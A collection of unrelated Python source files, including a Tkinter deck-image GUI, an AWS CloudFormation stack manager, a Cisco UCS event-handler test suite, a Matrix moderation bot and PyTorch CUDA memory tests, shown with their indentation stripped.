#we need manually pass python executable on windows because sys.executable will return service wrapper
python_binary = os.environ['PYTHON_EXE'] if 'PYTHON_EXE' in os.environ else sys.executable
python_command = [python_binary, "-S", script] + script_params
return python_command
def condenseOutput(self, stdout, stderr, retcode, structured_out):
log_lines_count = self.config.get('heartbeat', 'log_lines_count')
grep = self.grep
result = {
Constants.EXIT_CODE: retcode,
"stdout": grep.tail(stdout,
log_lines_count) if log_lines_count else stdout,
"stderr": grep.tail(stderr,
log_lines_count) if log_lines_count else stderr,
"structuredOut": structured_out
}
return result
def python_watchdog_func(self, python, timeout):
self.event.wait(timeout)
if python.returncode is None:
logger.error("Subprocess timed out and will be killed")
shell.kill_process_with_children(python.pid)
self.python_process_has_been_killed = True
pass
|
flippergui.py
|
import tkinter as tk
from tkinter import filedialog
import sys
import os
import flipper
import threading
from queue import Queue
from deckconverter import queue
from PIL import ImageTk, Image
import json
class FlipperGui(tk.Frame):
def __init__(self, master=None):
super().__init__(master, padx=12, pady=3)
if getattr(sys, 'frozen', False) :
self.baseDir = os.path.dirname(sys.executable)
else:
self.baseDir = os.path.dirname(os.path.realpath(__file__))
self.loadConfig()
self.master = master
self.queue = queue.initQueue()
self.grid()
rowIndex = 0
self.logoImage = ImageTk.PhotoImage(Image.open('logo.png'))
self.logoLabel = tk.Label(self, image=self.logoImage)
self.logoLabel.grid(row=rowIndex, column=0, columnspan=5)
rowIndex += 1
self.deckNameLabel = tk.Label(self, text='Deckname')
self.deckNameLabel.grid(row=rowIndex, column=0, sticky=tk.W)
self.deckNameEntry = tk.Entry(self, width=60)
self.deckNameEntry.grid(row=rowIndex, column=1, columnspan=3, stick=tk.W)
self.deckNameEntry.insert(0,'Deck')
rowIndex += 1
self.inputLabel = tk.Label(self, text='File or URL')
self.inputLabel.grid(row=rowIndex, column=0, sticky=tk.W)
self.inputEntry = tk.Entry(self, width=60)
self.inputEntry.grid(row=rowIndex, column=1, columnspan=3, sticky=tk.W)
self.inputButton = tk.Button(self, text='Browse', command=self.openFile)
self.inputButton.grid(row=rowIndex, column=4, sticky=tk.E)
rowIndex += 1
self.outputLabel = tk.Label(self, text='Output folder (optional)')
self.outputLabel.grid(row=rowIndex, column=0, sticky=tk.W)
self.outputEntry = tk.Entry(self, width=60)
self.outputEntry.grid(row=rowIndex, column=1, columnspan=3, sticky=tk.W)
self.outputEntry.insert(0,self.config['outputFolder'])
self.outputButton = tk.Button(self, text='Browse', command=self.openFolder)
self.outputButton.grid(row=rowIndex, column=4, sticky=tk.E)
rowIndex += 1
self.imgurLabel = tk.Label(self, text='ImgurID (optional)')
self.imgurLabel.grid(row=rowIndex, column=0, sticky=tk.W)
self.imgurEntry = tk.Entry(self, width=60)
self.imgurEntry.grid(row=rowIndex, column=1, columnspan=3, sticky=tk.W)
if self.config['imgurId']:
self.imgurEntry.insert(0,self.config['imgurId'])
self.imgurEntry.config(state='disabled')
rowIndex += 1
self.dropboxLabel = tk.Label(self, text='Dropbox Token(optional)')
self.dropboxLabel.grid(row=rowIndex, column=0, sticky=tk.W)
self.dropboxEntry = tk.Entry(self, width=60)
self.dropboxEntry.grid(row=rowIndex, column=1, columnspan=3, sticky=tk.W)
if self.config['dropboxToken']:
self.dropboxEntry.insert(0,self.config['dropboxToken'])
self.dropboxEntry.config(state='disabled')
rowIndex += 1
self.basicsLabel = tk.Label(self, text='Basic lands')
self.basicsLabel.grid(row=rowIndex, column=0, sticky=tk.W)
basicsOptions = ('guru','unstable','alpha','core','guay')
self.basicsVar = tk.StringVar()
self.basicsVar.set(self.config['basicSet'])
self.basicsMenu = tk.OptionMenu(self, self.basicsVar, *basicsOptions)
self.basicsMenu.grid(row=rowIndex, column=1, columnspan=2, sticky=tk.W)
rowIndex += 1
self.hiresVar = tk.IntVar()
self.hiresVar.set(int(self.config['hires']))
self.hiresCheckbutton = tk.Checkbutton(self, text='High Resolution', variable=self.hiresVar)
self.hiresCheckbutton.grid(row=rowIndex, column=0, sticky=tk.W)
self.hiresVar.trace('w', self.hiresVarCallback)
self.reprintsVar = tk.IntVar()
self.reprintsVar.set(int(self.config['reprints']))
self.reprintsCheckbutton = tk.Checkbutton(self, text='Reprints', variable=self.reprintsVar)
self.reprintsCheckbutton.grid(row=rowIndex, column=1, sticky=tk.W)
self.nocacheVar = tk.IntVar()
self.nocacheVar.set(int(self.config['nocache']))
self.nocacheCheckbutton = tk.Checkbutton(self, text='No cache', variable=self.nocacheVar)
self.nocacheCheckbutton.grid(row=rowIndex, column=2, sticky=tk.W)
self.imgurVar = tk.IntVar()
self.imgurVar.set(int(self.config['imgur']))
self.imgurCheckbutton = tk.Checkbutton(self, text='Imgur Upload', variable=self.imgurVar)
self.imgurCheckbutton.grid(row=rowIndex, column=3, sticky=tk.W)
self.imgurVar.trace('w', self.imgurVarCallback)
self.updateImgurEntry()
self.dropboxVar = tk.IntVar()
self.dropboxVar.set(int(self.config['dropbox']))
self.dropboxCheckbutton = tk.Checkbutton(self, text='Dropbox Upload', variable=self.dropboxVar)
self.dropboxCheckbutton.grid(row=rowIndex, column=4, sticky=tk.W)
self.dropboxVar.trace('w', self.dropboxVarCallback)
self.updateDropboxEntry()
rowIndex += 1
self.progressLabel = tk.Label(self, text='Ready')
self.progressLabel.grid(row=rowIndex, column=0, columnspan=4, sticky=tk.W)
self.generateButton = tk.Button(self, text='Generate', command=self.generate)
self.generateButton.grid(row=rowIndex, column=4, sticky=tk.E)
self.processQueue()
def processQueue(self):
while self.queue.qsize():
msg = self.queue.get(0)
if msg['type'] == 'done':
self.saveConfig()
self.enableInputs()
self.updateProgressLabel('All done!')
elif msg['type'] == 'error':
self.enableInputs()
self.updateProgressLabel(msg['text'], fg='red')
elif msg['type'] == 'message':
self.updateProgressLabel(msg['text'])
self.master.after(100, self.processQueue)
def getInitialDir(self, path):
if os.path.isfile(path):
return os.path.dirname(path)
elif os.path.isdir(path):
return path
elif os.path.expanduser('~'):
return os.path.expanduser('~')
else:
return self.baseDir
def openFile(self):
currentInput = self.inputEntry.get()
initialDir = self.getInitialDir(currentInput)
filename = filedialog.askopenfilename(initialdir=initialDir,parent=self,title='Decklist')
if filename:
self.inputEntry.delete(0, tk.END)
self.inputEntry.insert(0, filename)
def openFolder(self):
currentOutput = self.outputEntry.get()
initialDir = self.getInitialDir(currentOutput)
dirname = filedialog.askdirectory(initialdir=initialDir,parent=self,title='Output directory')
if dirname:
self.outputEntry.delete(0, tk.END)
self.outputEntry.insert(0, dirname)
def generate(self):
inputStr = self.inputEntry.get()
deckName = self.deckNameEntry.get()
outputFolder = self.outputEntry.get()
imgur = bool(self.imgurVar.get())
dropbox = bool(self.dropboxVar.get())
if len(inputStr) == 0:
self.updateProgressLabel('Must give filename or URL', fg='red')
return
if len(deckName) == 0:
self.updateProgressLabel('Must give a deckname', fg='red')
return
if len(outputFolder) and not os.path.isdir(outputFolder):
self.updateProgressLabel('Output folder must exist', fg='red')
return
if imgur:
imgurId = self.imgurEntry.get()
if len(imgurId) == 0:
self.updateProgressLabel('Must have ImgurID', fg='red')
return
else:
imgurId = None
if dropbox:
dropboxToken = self.dropboxEntry.get()
if len(dropboxToken) == 0:
self.updateProgressLabel('Must have Dropbox Token', fg='red')
return
else:
dropboxToken = None
hires = bool(self.hiresVar.get())
reprints = bool(self.reprintsVar.get())
nocache = bool(self.nocacheVar.get())
basicSet = self.basicsVar.get()
self.updateConfig()
self.thread = threading.Thread(target=flipper.generate,args=(inputStr, deckName, hires, reprints, nocache, imgurId, dropboxToken, outputFolder, basicSet))
self.thread.start()
self.disableInputs()
self.updateProgressLabel('Generating....')
def disableInputs(self):
self.inputEntry.config(state='disabled')
self.inputButton.config(state='disabled')
self.deckNameEntry.config(state='disabled')
self.generateButton.config(state='disabled')
self.outputEntry.config(state='disabled')
self.outputButton.config(state='disabled')
self.hiresCheckbutton.config(state='disabled')
self.reprintsCheckbutton.config(state='disabled')
self.nocacheCheckbutton.config(state='disabled')
self.imgurCheckbutton.config(state='disabled')
self.imgurEntry.config(state='disabled')
self.dropboxCheckbutton.config(state='disabled')
self.dropboxEntry.config(state='disabled')
def enableInputs(self):
self.inputEntry.config(state='normal')
self.inputButton.config(state='normal')
self.deckNameEntry.config(state='normal')
self.generateButton.config(state='normal')
self.outputEntry.config(state='normal')
self.outputButton.config(state='normal')
self.hiresCheckbutton.config(state='normal')
self.reprintsCheckbutton.config(state='normal')
self.nocacheCheckbutton.config(state='normal')
self.imgurCheckbutton.config(state='normal')
self.dropboxCheckbutton.config(state='normal')
self.updateImgurEntry()
self.updateDropboxEntry()
def hiresVarCallback(self, name, index, mode):
hires = bool(self.hiresVar.get())
imgur = bool(self.imgurVar.get())
if hires and imgur:
self.imgurVar.set(False)
def imgurVarCallback(self, name, index, mode):
hires = bool(self.hiresVar.get())
imgur = bool(self.imgurVar.get())
dropbox = bool(self.dropboxVar.get())
if hires and imgur:
self.hiresVar.set(False)
if dropbox and imgur:
self.dropboxVar.set(False)
self.updateImgurEntry()
def updateImgurEntry(self):
imgur = bool(self.imgurVar.get())
if imgur:
self.imgurEntry.config(state='normal')
else:
self.imgurEntry.config(state='disabled')
def dropboxVarCallback(self, name, index, mode):
imgur = bool(self.imgurVar.get())
dropbox = bool(self.dropboxVar.get())
if dropbox and imgur:
self.imgurVar.set(False)
self.updateDropboxEntry()
def updateDropboxEntry(self):
dropbox = bool(self.dropboxVar.get())
if dropbox:
self.dropboxEntry.config(state='normal')
else:
self.dropboxEntry.config(state='disabled')
def updateProgressLabel(self, message, fg='black'):
self.progressLabel['text'] = message
self.progressLabel['fg'] = fg
def updateConfig(self):
hires = bool(self.hiresVar.get())
reprints = bool(self.reprintsVar.get())
nocache = bool(self.nocacheVar.get())
basicSet = self.basicsVar.get()
outputFolder = self.outputEntry.get()
imgur = bool(self.imgurVar.get())
dropbox = bool(self.dropboxVar.get())
imgurId = self.imgurEntry.get()
dropboxToken = self.dropboxEntry.get()
self.config['imgurId'] = imgurId
self.config['imgur'] = imgur
self.config['dropboxToken'] = dropboxToken
self.config['dropbox'] = dropbox
self.config['outputFolder'] = outputFolder
self.config['hires'] = hires
self.config['reprints'] = reprints
self.config['nocache'] = nocache
self.config['basicSet'] = basicSet
def loadConfig(self):
# Default values
config = {
'imgurId':None,
'imgur': False,
'dropboxToken':None,
'dropbox': False,
'outputFolder':'',
'hires' : False,
'reprints' : False,
'nocache' : False,
'basicSet' : 'guru'
}
if os.path.isfile('config.json'):
# We have some kind of saved config, let's use it.
with open('config.json', 'r',encoding='utf8') as infile:
saved = json.load(infile)
config = {**config, **saved}
self.config = config
def saveConfig(self):
with open('config.json', 'w', encoding='utf8') as outfile:
json.dump(self.config, outfile)
def main():
flipper.initApp()
root = tk.Tk()
root.title('Tableflipper Extreme')
app = FlipperGui(master=root)
root.mainloop()
if __name__ == '__main__':
sys.exit(main())
|
cloudformation.py
|
from .client import *
class cloudformation(client):
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.client = self._get_client('cloudformation')
if 'ignore_drift' not in kwargs.keys() or (
kwargs['ignore_drift'] not in [True, False]
):
check_ignore = input('Ignore drift [Yes/No]: ')
if check_ignore == 'Yes':
self._ignore_drift = True
else:
self._ignore_drift = False
else:
self._ignore_drift = kwargs['ignore_drift']
def __del__(self):
logger.info(f'{self._name} complete')
def create_update(self, **kwargs):
# First try to create the stack new.
try:
create_stack = self.client.create_stack(
StackName=kwargs['stack'],
TemplateBody=kwargs['template'],
Parameters=kwargs['cli_input']['Parameters'],
Tags=kwargs['cli_input']['Tags'],
Capabilities=kwargs['capabilities'],
)
# Thread the status checker
self._stack_id=create_stack['StackId']
self._thread = threading.Thread(target=self.__check_create_update)
self._thread.start()
logger.info(f'Creating stack in {self._name}')
except botocore.exceptions.ClientError as create_error:
# The AlreadyExistsException shows when a stack with the same name already exists, begin update process.
if create_error.response['Error']['Code'] == 'AlreadyExistsException':
# Detect drift in stack before updating.
detect_drift = self.client.detect_stack_drift(StackName=kwargs['stack'])
drift_detect_id = detect_drift["StackDriftDetectionId"]
drift_detect_status = ""
while drift_detect_status not in ["DETECTION_COMPLETE", "DETECTION_FAILED"]:
check_drift_detect_status = self.client.describe_stack_drift_detection_status(StackDriftDetectionId=drift_detect_id)
drift_detect_status = check_drift_detect_status["DetectionStatus"]
time.sleep(1) # Avoid throttling
# If there is no drift or if we're ignoring drift, proceed with update,
if check_drift_detect_status['StackDriftStatus'] == 'IN_SYNC' or (check_drift_detect_status['StackDriftStatus'] == 'DRIFTED' and self._ignore_drift):
if not self._ignore_drift:
logger.info(f'No drift detected in {self._name}')
try:
update_stack = self.client.update_stack(
StackName=kwargs['stack'],
TemplateBody=kwargs['template'],
Parameters=kwargs['cli_input']['Parameters'],
Tags=kwargs['cli_input']['Tags'],
Capabilities=kwargs['capabilities']
)
# Thread the status checker
self._stack_id=update_stack['StackId']
self._thread = threading.Thread(target=self.__check_create_update)
self._thread.start()
logger.info(f'Updating stack in {self._name}')
except botocore.exceptions.ClientError as update_error:
if update_error.response['Error']['Code'] == 'ValidationError':
# A stack that doesn't differ from template in update will throw a ValidationError with the message below.
if update_error.response['Error']['Message'] == 'No updates are to be performed.':
# This isn't a problem, the update is skipped
logger.info(f'No updates to be performed in {self._name}')
else:
# Any other errors are problematic, too.
logger.error(f'Error in {self._name} - {update_error.response["Error"]["Code"]} - {update_error.response["Error"]["Message"]}')
else:
# If there is drift is detected that's a problem, don't update the stack.
if check_drift_detect_status['StackDriftStatus'] == 'DRIFTED':
logger.warning(f'Drift detected in {self._name} - skipping update')
# If we get another response code from drift detection, we've got a problem.
else:
logger.warning(f'Unhandled drift status in {self._name} - {check_drift_detect_status["StackDriftStatus"]}')
else:
# Any other create_stack errors are problems.
logger.error(f'Unhandled create error in {self._name} - {create_error.response["Error"]["Code"]} - {create_error.response["Error"]["Message"]}')
def __check_create_update(self):
stack_status = ""
# Any of these status returns means we need to wait and check again.
while stack_status in ["", 'CREATE_IN_PROGRESS', 'ROLLBACK_IN_PROGRESS', 'UPDATE_IN_PROGRESS', 'UPDATE_COMPLETE_CLEANUP_IN_PROGRESS', 'UPDATE_ROLLBACK_IN_PROGRESS', 'UPDATE_ROLLBACK_COMPLETE_CLEANUP_IN_PROGRESS']:
describe = self.client.describe_stacks(StackName=self._stack_id)
stack_status = describe['Stacks'][0]['StackStatus']
time.sleep(5) # Avoid throttling
# Any of these status returns are good.
if stack_status in ['CREATE_COMPLETE', 'UPDATE_COMPLETE']:
logger.info(f'{self._name} - {stack_status}')
# Any of these status returns result in an error.
if stack_status in ['CREATE_FAILED', 'ROLLBACK_FAILED', 'ROLLBACK_COMPLETE', 'UPDATE_ROLLBACK_FAILED', 'UPDATE_ROLLBACK_COMPLETE']:
logger.error(f'{self._name} - {stack_status}')
def delete(self, **kwargs):
# See if the stack exists
try:
find_stack = self.client.describe_stacks(
StackName=kwargs['stack']
)
if find_stack['Stacks']:
stack_id = find_stack['Stacks'][0]['StackId']
logger.info(f'Deleting {kwargs["stack"]} from {self._name}')
delete_stack = self.client.delete_stack(
StackName=kwargs['stack']
)
self._stack_id=stack_id
self._thread = threading.Thread(target=self.__check_delete)
self._thread.start()
except botocore.exceptions.ClientError as delete_error:
logger.info(f'{kwargs["stack"]} not in {self._name}')
def __check_delete(self):
stack_status = ""
# Look through all stacks
while stack_status in ["", 'DELETE_IN_PROGRESS']:
paginator = self.client.get_paginator('list_stacks')
pages = paginator.paginate()
for page in pages:
for stack in page['StackSummaries']:
if stack['StackId'] == self._stack_id:
stack_status = stack['StackStatus']
if 'StackStatusReason' in stack.keys():
status_reason = stack['StackStatusReason']
time.sleep(5) # Avoid throttling
if stack_status == 'DELETE_COMPLETE':
logger.info(f'{self._name} - {stack_status}')
else:
logger.error(f'{self._name} - {stack_status} - {status_reason}')
|
test_eventhandler.py
|
# Copyright 2015 Cisco Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import time
from nose import SkipTest
from nose.tools import *
from ..connection.info import custom_setup, custom_teardown, get_skip_msg
import threading
handle = None
sp = None
dn = "org-root/ls-eventhandle-test"
finished = False
def setup_module():
from ucsmsdk.ucseventhandler import UcsEventHandle
from ucsmsdk.mometa.ls.LsServer import LsServer
global handle, sp, ueh
handle = custom_setup()
if not handle:
msg = get_skip_msg()
raise SkipTest(msg)
ueh = UcsEventHandle(handle)
org = handle.query_dn("org-root")
sp = LsServer(org, name="eventhandle-test", descr="")
handle.add_mo(sp, True)
handle.commit()
def teardown_module():
if sp is not None:
handle.remove_mo(sp)
handle.commit()
custom_teardown(handle)
def user_callback(mce):
global finished
finished = True
def wait_method(poll_sec=None):
# Always clear the label
sp.usr_lbl = ""
handle.add_mo(sp, modify_present=True)
handle.commit()
handle.wait_for_event(
mo=sp,
prop="usr_lbl",
value="trigger",
cb=user_callback,
timeout=20,
poll_sec=poll_sec
)
def wait_method_for_multiple_values(poll_sec=None):
handle.wait_for_event(
mo=sp,
prop="usr_lbl",
value=["trigger", "another_trigger"],
cb=user_callback,
timeout=20,
poll_sec=poll_sec
)
def trigger_method(label=None):
sp.usr_lbl = label
handle.set_mo(sp)
handle.commit()
def test_wait_for_event_mo():
global finished
finished = False
t1 = threading.Thread(name="wait", target=wait_method)
t2 = threading.Thread(name="trigger", target=trigger_method, args=("trigger",))
t1.start()
time.sleep(1)
t2.start()
t1.join()
t2.join()
assert_equal(finished, True)
def test_wait_for_poll_mo():
global finished
finished = False
t1 = threading.Thread(name="wait", target=wait_method, args=(5,))
t2 = threading.Thread(name="trigger", target=trigger_method, args=("trigger",))
t1.start()
time.sleep(1)
t2.start()
t1.join()
t2.join()
assert_equal(finished, True)
def test_wait_for_event_timeout():
global finished
finished = False
t1 = threading.Thread(name="wait", target=wait_method)
t2 = threading.Thread(name="trigger", target=trigger_method, args=("invalid_trigger",))
t1.start()
time.sleep(1)
t2.start()
t1.join()
t2.join()
assert_equal(finished, False)
def test_wait_for_poll_timeout():
global finished
finished = False
t1 = threading.Thread(name="wait", target=wait_method, args=(2,))
t2 = threading.Thread(name="trigger", target=trigger_method, args=("invalid_trigger",))
t1.start()
time.sleep(1)
t2.start()
t1.join()
t2.join()
assert_equal(finished, False)
@raises(Exception)
def test_wait_for_event_invalid_mo():
other_mo = handle.query_dn("capabilities")
handle.wait_for_event(
mo=other_mo,
prop="usr_lbl",
value="trigger",
cb=user_callback,
timeout=20
)
@raises(Exception)
def test_wait_for_poll_invalid_mo():
other_mo = handle.query_dn("capabilities")
handle.wait_for_event(
mo=other_mo,
prop="usr_lbl",
value="trigger",
cb=user_callback,
timeout=20,
poll_sec=5
)
def test_wait_for_event_multiple():
global finished
finished = False
t1 = threading.Thread(name="wait", target=wait_method_for_multiple_values)
t2 = threading.Thread(name="trigger", target=trigger_method, args=("trigger",))
t1.start()
time.sleep(1)
t2.start()
t1.join()
t2.join()
assert_equal(finished, True)
def test_wait_for_poll_multiple():
global finished
finished = False
t1 = threading.Thread(name="wait", target=wait_method_for_multiple_values, args=(2,))
t3 = threading.Thread(name="another_trigger", target=trigger_method, args=("another_trigger",))
t1.start()
time.sleep(1)
t3.start()
t1.join()
t3.join()
assert_equal(finished, True)
def test_wait_for_event_timeout_noenqueue():
handle.wait_for_event(
mo=sp,
prop="usr_lbl",
value="trigger",
cb=user_callback,
timeout=5
)
|
matrix.py
|
from typing import *
import asyncio
import concurrent.futures
import contextlib
import logging
import threading
import nio
from .config import Config
logger = logging.getLogger('synapse_anti_ping.Matrix')
class Matrix:
def __init__(self, config: Config) -> None:
self._loop = asyncio.get_event_loop()
self._thread = threading.Thread(target=self._run)
self._thread.daemon = True # so ctrl-c cleanly exits
self._init_event = asyncio.Event()
self._config = config
assert config.user.homeserver is not None
self._client = nio.AsyncClient(config.user.homeserver, config.user.user)
def start(self) -> None:
self._thread.start()
async def _initialize(self) -> None:
logger.info('Matrix thread logging in')
while True:
result = await self._client.login(self._config.user.password)
if isinstance(result, nio.LoginError):
logger.error('Error occurred on login, trying again later: '
f'{result.message}') # type: ignore
await asyncio.sleep(2)
continue
break
logger.info('Matrix thread joining rooms')
await self._client.join(self._config.mjolnir.room)
if self._config.mjolnir.room != self._config.log.room:
await self._client.join(self._config.log.room)
logger.info('Matrix thread initialized')
self._init_event.set()
async def _complete_send_message(self, message: str, *, room: str, formatted: str, notice: bool,
join: bool) -> None:
logger.info(f'Waiting to ensure init is complete')
await self._init_event.wait()
if join:
await self._client.join(room)
logger.info(f'Completing send message command')
content = {
'msgtype': 'm.notice' if notice else 'm.text',
'body': message,
}
if formatted:
content['format'] = 'org.matrix.custom.html'
content['formatted_body'] = formatted
await self._client.room_send( # type: ignore
room_id=room, message_type='m.room.message', content=content)
def send_message(self,
message: str,
*,
room: str,
formatted: str = '',
notice: bool = False,
join: bool = True) -> 'concurrent.futures.Future[None]':
logger.info(f'Message send in progress')
return asyncio.run_coroutine_threadsafe(
self._complete_send_message(message,
room=room,
formatted=formatted,
notice=notice,
join=join), self._loop)
def _run(self) -> None:
logger.info('Starting main loop')
asyncio.ensure_future(self._initialize(), loop=self._loop)
self._loop.run_forever()
class EventLimiter:
class Inserter:
def __init__(self, key: str) -> None:
self.key = key
self.future: 'concurrent.futures.Future[None]'
def insert(self, future: 'concurrent.futures.Future[None]') -> None:
assert self
self.future = future
def __bool__(self) -> bool:
return bool(self.key)
def __init__(self) -> None:
self._active: Set[str] = set()
@contextlib.contextmanager
def insert(self, key: str) -> 'Iterator[Inserter]':
if key in self._active:
yield EventLimiter.Inserter('')
else:
inserter = EventLimiter.Inserter(key)
yield inserter
inserter.future.add_done_callback(lambda _: self._active.remove(key))
self._active.add(key)
class Mjolnir:
def __init__(self, config: Config, matrix: Matrix) -> None:
self._config = config
self._matrix = matrix
self._in_progress_bans = EventLimiter()
def ban(self, user: str) -> None:
with self._in_progress_bans.insert(user) as inserter:
if not inserter:
return
logger.info(f'Ban on {user} in progress')
command = (f'{self._config.mjolnir.prefix} ban {self._config.mjolnir.banlist}'
f' user {user} spam')
inserter.future = self._matrix.send_message(command, room=self._config.mjolnir.room)
|
test_cuda.py
|
from itertools import repeat, chain, product
from typing import NamedTuple
import collections
import gc
import io
import os
import pickle
import queue
import sys
import tempfile
import threading
import unittest
import torch
import torch.cuda
import torch.cuda.comm as comm
from torch import multiprocessing as mp
from torch.nn.parallel import scatter_gather
from torch.utils.checkpoint import checkpoint_sequential
from torch._six import inf, nan
from test_torch import AbstractTestCases
from torch.testing._internal.common_methods_invocations import tri_tests_args, tri_large_tests_args, \
_compare_trilu_indices, _compare_large_trilu_indices
from torch.testing._internal.common_utils import TestCase, freeze_rng_state, run_tests, \
NO_MULTIPROCESSING_SPAWN, skipIfRocm, load_tests, IS_REMOTE_GPU, IS_SANDCASTLE, IS_WINDOWS, \
slowTest, skipCUDANonDefaultStreamIf, skipCUDAMemoryLeakCheckIf, TEST_WITH_ROCM, TEST_NUMPY
from torch.testing._internal.autocast_test_lists import AutocastTestLists
# load_tests from common_utils is used to automatically filter tests for
# sharding on sandcastle. This line silences flake warnings
load_tests = load_tests
# We cannot import TEST_CUDA and TEST_MULTIGPU from torch.testing._internal.common_cuda here,
# because if we do that, the TEST_CUDNN line from torch.testing._internal.common_cuda will be executed
# multiple times as well during the execution of this test suite, and it will
# cause CUDA OOM error on Windows.
TEST_CUDA = torch.cuda.is_available()
TEST_MULTIGPU = TEST_CUDA and torch.cuda.device_count() >= 2
if not TEST_CUDA:
print('CUDA not available, skipping tests', file=sys.stderr)
TestCase = object # noqa: F811
TEST_LARGE_TENSOR = TEST_CUDA
TEST_MEDIUM_TENSOR = TEST_CUDA
TEST_CUDNN = TEST_CUDA
if TEST_CUDA:
torch.ones(1).cuda() # initialize cuda context
TEST_CUDNN = TEST_CUDA and (TEST_WITH_ROCM or
torch.backends.cudnn.is_acceptable(torch.tensor(1., device=torch.device('cuda:0'))))
TEST_LARGE_TENSOR = torch.cuda.get_device_properties(0).total_memory >= 12e9
TEST_MEDIUM_TENSOR = torch.cuda.get_device_properties(0).total_memory >= 6e9
types = [
torch.FloatTensor,
torch.DoubleTensor,
torch.LongTensor,
torch.IntTensor,
torch.ShortTensor,
torch.CharTensor,
torch.ByteTensor,
torch.HalfTensor,
]
def make_sparse_tensor(t, n, *sizes):
assert t.is_sparse
tensor = t()
i = tensor._indices()
i = i.new(len(sizes), n).copy_(
torch.cat([torch.LongTensor(1, n).random_(s) for s in sizes], 0))
v = tensor._values()
v = v.new(n).copy_(torch.randn(n))
return t(i, v, torch.Size(sizes))
_cycles_per_ms = None
def get_cycles_per_ms():
"""Approximate number of cycles per millisecond for torch.cuda._sleep"""
global _cycles_per_ms
if _cycles_per_ms is None:
start = torch.cuda.Event(enable_timing=True)
end = torch.cuda.Event(enable_timing=True)
start.record()
torch.cuda._sleep(1000000)
end.record()
end.synchronize()
_cycles_per_ms = 1000000 / start.elapsed_time(end)
return _cycles_per_ms
class TestCuda(TestCase):
_do_cuda_memory_leak_check = True
_do_cuda_non_default_stream = True
FIFTY_MIL_CYCLES = 50000000
def setUp(self):
super(TestCuda, self).setUp()
self.autocast_lists = AutocastTestLists(torch.device('cuda:0'))
def tearDown(self):
del self.autocast_lists
super(TestCuda, self).tearDown()
def _check_memory_stat_consistency(self):
snapshot = torch.cuda.memory_snapshot()
expected_each_device = collections.defaultdict(lambda: collections.defaultdict(int))
for segment in snapshot:
expected = expected_each_device[segment["device"]]
pool_str = segment["segment_type"] + "_pool"
expected["segment.all.current"] += 1
expected["segment." + pool_str + ".current"] += 1
expected["allocated_bytes.all.current"] += segment["allocated_size"]
expected["allocated_bytes." + pool_str + ".current"] += segment["allocated_size"]
expected["reserved_bytes.all.current"] += segment["total_size"]
expected["reserved_bytes." + pool_str + ".current"] += segment["total_size"]
expected["active_bytes.all.current"] += segment["active_size"]
expected["active_bytes." + pool_str + ".current"] += segment["active_size"]
is_split = len(segment["blocks"]) > 1
for block in segment["blocks"]:
if block["state"] == "active_allocated":
expected["allocation.all.current"] += 1
expected["allocation." + pool_str + ".current"] += 1
if block["state"].startswith("active_"):
expected["active.all.current"] += 1
expected["active." + pool_str + ".current"] += 1
if block["state"] == "inactive" and is_split:
expected["inactive_split.all.current"] += 1
expected["inactive_split." + pool_str + ".current"] += 1
expected["inactive_split_bytes.all.current"] += block["size"]
expected["inactive_split_bytes." + pool_str + ".current"] += block["size"]
for device, expected in expected_each_device.items():
stats = torch.cuda.memory_stats(device)
for k, v in expected.items():
self.assertEqual(v, stats[k])
@staticmethod
def _test_memory_stats_generator(self, device=None, N=35):
if device is None:
device = torch.cuda.current_device()
m0 = torch.cuda.memory_allocated(device)
last_m_arr = [torch.cuda.memory_allocated(device)]
max_m_arr = [torch.cuda.max_memory_allocated(device)]
last_r_arr = [torch.cuda.memory_reserved(device)]
max_r_arr = [torch.cuda.max_memory_reserved(device)]
def alloc(*size):
with torch.cuda.device(device):
# NOTE: do **not** use methods that can have additional
# memory overhead, e.g., inplace random sampling methods.
# they can leave some memory occupied even after being
# deallocated, e.g., initialized RNG state, causing some
# memory checks below to fail.
return torch.cuda.FloatTensor(*size)
def assert_change(comp=1, empty_cache=False, reset_peak=False):
# comp > 0: increased
# comp = 0: equal
# comp < 0: decreased
new_m = torch.cuda.memory_allocated(device)
new_max_m = torch.cuda.max_memory_allocated(device)
if comp > 0:
self.assertGreater(new_m, last_m_arr[0])
elif comp < 0:
self.assertLess(new_m, last_m_arr[0])
else:
self.assertEqual(new_m, last_m_arr[0])
self.assertLessEqual(new_m, new_max_m)
self.assertGreaterEqual(new_max_m, max_m_arr[0])
last_m_arr[0] = new_m
max_m_arr[0] = new_max_m
new_r = torch.cuda.memory_reserved(device)
new_max_r = torch.cuda.max_memory_reserved(device)
# emptying cache may happen (due to allocation or empty_cache), so
# we can't assert new_c >= last_c
self.assertLessEqual(new_r, new_max_r)
self.assertGreaterEqual(new_max_r, max_r_arr[0])
last_r_arr[0] = new_r
max_r_arr[0] = new_max_r
if empty_cache:
torch.cuda.empty_cache()
new_r = torch.cuda.memory_reserved(device)
new_max_r = torch.cuda.max_memory_reserved(device)
self.assertLessEqual(new_r, last_r_arr[0])
self.assertLessEqual(new_r, new_max_r)
self.assertEqual(new_max_r, max_r_arr[0])
last_r_arr[0] = new_r
if reset_peak:
torch.cuda.reset_peak_memory_stats(device)
self.assertEqual(torch.cuda.memory_allocated(device), last_m_arr[0])
self.assertEqual(torch.cuda.max_memory_allocated(device), last_m_arr[0])
max_m_arr[0] = last_m_arr[0]
self.assertEqual(torch.cuda.memory_reserved(device), last_r_arr[0])
self.assertEqual(torch.cuda.max_memory_reserved(device), last_r_arr[0])
max_r_arr[0] = last_r_arr[0]
assert_change(0)
assert_change(0, reset_peak=True)
assert_change(0, empty_cache=True)
assert_change(0, reset_peak=True)
assert_change(0)
yield
tensors1 = [alloc(1), alloc(10, 20), alloc(200, 300, 2000)]
m1 = torch.cuda.memory_allocated(device)
assert_change(1)
yield
tensors2 = []
for i in range(1, int(N / 2) + 1):
# small ones
tensors2.append(alloc(i, i * 4))
assert_change(1)
yield
for i in range(5, int(N / 2) + 5):
# large ones
tensors2.append(alloc(i, i * 7, i * 9, i * 11))
assert_change(1, reset_peak=(i % 2 == 0))
yield
tensors2.append(alloc(0, 0, 0))
assert_change(0)
yield
permute = []
for i in torch.randperm(len(tensors2)):
permute.append(tensors2[i])
assert_change(0)
yield
del tensors2
assert_change(0)
yield
